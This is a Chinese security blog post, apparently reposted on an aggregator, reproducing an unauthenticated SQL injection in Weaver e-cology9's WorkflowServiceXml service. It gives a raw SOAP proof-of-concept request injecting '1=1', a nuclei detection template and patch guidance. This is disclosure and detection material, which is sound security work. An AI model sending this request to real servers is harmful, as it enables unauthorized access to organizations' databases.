当前位置: 首页> 娱乐> 八卦 > 【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞

【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞

时间:2025/8/9 21:30:53来源:https://blog.csdn.net/weixin_53009585/article/details/140446112 浏览次数:0次

文章目录

  • 前言
    • 漏洞描述
    • 影响范围
  • 漏洞复现
    • nuclei脚本
  • 安全修复

前言

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞名称泛微e-cology9 WorkflowServiceXml SQL注入漏洞
公开时间2024-07-10
威胁类型命令执行

漏洞描述

在默认配置下,未授权攻击者可利用该漏洞执行任意SQL语句,从而造成任意命令执行。

影响范围

泛微e-cology9 < 10.64.1

漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1
Host: x.x.x.x
Content-Type: text/xml;charset=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"><soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述

nuclei脚本

id: 泛微e-cology9 WorkflowServiceXml SQL注入漏洞info:name: 泛微e-cology9 WorkflowServiceXml SQL注入漏洞author: whgojpseverity: infodescription: 在默认配置下,未授权攻击者可利用该漏洞执行任意SQL语句,从而造成任意命令执行http:- raw:- |POST /services/WorkflowServiceXml HTTP/1.1Host: {{Hostname}}Content-Type: text/xml;charset=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"><soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body></soapenv:Envelope>matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "getHendledWorkflowRequestListResponse"

安全修复

目前官方已发布安全补丁,建议受影响用户升级至最新版本:

泛微e-cology 9 >= 10.64.1

官方补丁下载地址:

https://www.weaver.com.cn/cs/securityDownload.html

我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=2g93y2r9ge1w0

关键字:【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: